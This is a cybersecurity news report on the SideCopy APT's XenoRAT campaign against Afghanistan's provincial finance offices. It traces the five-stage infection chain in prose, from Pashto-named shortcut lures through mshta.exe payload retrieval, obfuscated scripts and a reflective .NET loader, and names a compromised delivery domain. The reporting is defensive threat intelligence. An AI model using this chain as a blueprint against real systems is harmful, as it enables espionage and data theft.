SideCopy Hackers Launch Sophisticated XenoRAT Attack on Afghanistan’s Finance Ministry
In a meticulously orchestrated cyberattack, the Pakistan-linked Advanced Persistent Threat (APT) group known as SideCopy has targeted Afghanistan’s Ministry of Finance. This operation, identified as Operation XENOFISCAL, involved deploying the persistent remote access tool XenoRAT to infiltrate the Ministry’s provincial finance offices, known as Mustoufiats, across all 34 Afghan provinces.
Attack Methodology:
The intrusion commenced with spear-phishing emails sent to finance officials. These emails contained ZIP archives housing malicious shortcut files (.lnk) disguised with PDF icons and filenames in Pashto, the primary language of Afghan government communications. The deceptive filenames suggested the documents were lists of employees invited to seminars on psychological and intellectual warfare, indicating the attackers’ deep understanding of their targets’ operational environment.
Upon opening the shortcut file, the malware exploited mshta.exe—a legitimate Windows utility—to fetch a remote payload from a compromised Afghan educational domain. This technique, known as Living-off-the-Land (LotL), leverages trusted system tools to execute malicious code, thereby evading detection by security software.
Infection Chain:
The attack unfolded through a five-stage infection chain:
1. Initial Execution: The victim opens the malicious shortcut file, triggering mshta.exe to execute.
2. Payload Retrieval: Mshta.exe downloads an HTML Application (HTA) payload from the compromised domain abimj.edu.af.
3. Obfuscated Script Execution: The HTA file contains obfuscated JavaScript, which decodes itself in memory to evade detection.
4. Loader Deployment: The script drops a .NET-based loader DLL that continues the infection process.
5. Final Payload Delivery: The loader downloads an encoded, GZIP-compressed blob from attacker-controlled URLs, unpacks it in memory, and uses reflective loading to inject the final payload without writing it to disk.
This fileless approach significantly reduces the likelihood of detection by traditional antivirus solutions.
XenoRAT Capabilities:
Once deployed, XenoRAT establishes an encrypted connection to a command-and-control (C2) server located in Frankfurt, Germany. This infrastructure is deliberately separated from the initial delivery domain to maintain persistent access even if the delivery mechanism is discovered and neutralized.
XenoRAT is an open-source Remote Access Trojan (RAT) available on GitHub, offering a range of surveillance capabilities, including:
– System Information Gathering: Collecting detailed information about the infected system.
– File Management: Accessing, modifying, and exfiltrating files.
– Process Control: Managing running processes on the infected machine.
– Screen Capture: Taking screenshots of the victim’s desktop.
– Keylogging: Recording keystrokes to capture sensitive information.
Attribution and Context:
Analysts from Seqrite, in a report shared with Cyber Security News, have attributed this campaign to the SideCopy APT group with medium-to-high confidence. SideCopy operates under the broader Transparent Tribe umbrella, also known as APT36, a group with a documented history of targeting South Asian government institutions. Seqrite Labs has been monitoring this threat cluster for years as part of its global spear-phishing monitoring program.
This attack underscores the evolving tactics of state-sponsored threat actors who are increasingly leveraging open-source tools like XenoRAT to enhance their operational capabilities while minimizing development costs. The use of legitimate system utilities and fileless malware techniques highlights the need for advanced detection mechanisms that can identify and mitigate such sophisticated threats.
Implications and Recommendations:
The successful deployment of XenoRAT in this campaign poses significant risks, including unauthorized access to sensitive financial data, potential disruption of governmental operations, and the possibility of further exploitation through lateral movement within the network.
To mitigate such threats, organizations are advised to:
– Enhance Email Security: Implement advanced email filtering solutions to detect and block spear-phishing attempts.
– User Training: Conduct regular cybersecurity awareness training to help employees recognize and avoid phishing attacks.
– Endpoint Detection and Response (EDR): Deploy EDR solutions capable of identifying and responding to fileless malware and Living-off-the-Land techniques.
– Network Segmentation: Implement network segmentation to limit the spread of malware within the organization.
– Regular Updates: Ensure all systems and software are up-to-date with the latest security patches.
By adopting a multi-layered security approach, organizations can better defend against sophisticated cyber threats like those posed by the SideCopy APT group.
